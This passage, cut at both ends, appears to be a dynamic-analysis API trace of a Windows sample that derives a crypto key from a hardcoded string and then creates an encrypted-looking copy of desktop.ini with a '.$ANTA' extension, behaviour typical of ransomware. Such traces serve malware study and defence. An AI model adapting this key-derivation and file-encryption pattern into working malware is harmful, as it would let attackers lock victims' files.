0x43ca280 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0086.039] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0086.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0086.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0086.041] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0086.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca448 [0086.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca448, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.044] CryptHashData (hHash=0x41ac540, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0086.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0086.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0086.046] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0086.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0086.046] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0086.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0086.047] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0086.047] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0086.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca2e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0086.048] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0086.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0086.048] CryptDestroyHash (hHash=0x41ac540) returned 1 [0086.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0086.049] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.049] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0086.049] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0086.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0086.049] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\downloads\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0086.050] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: 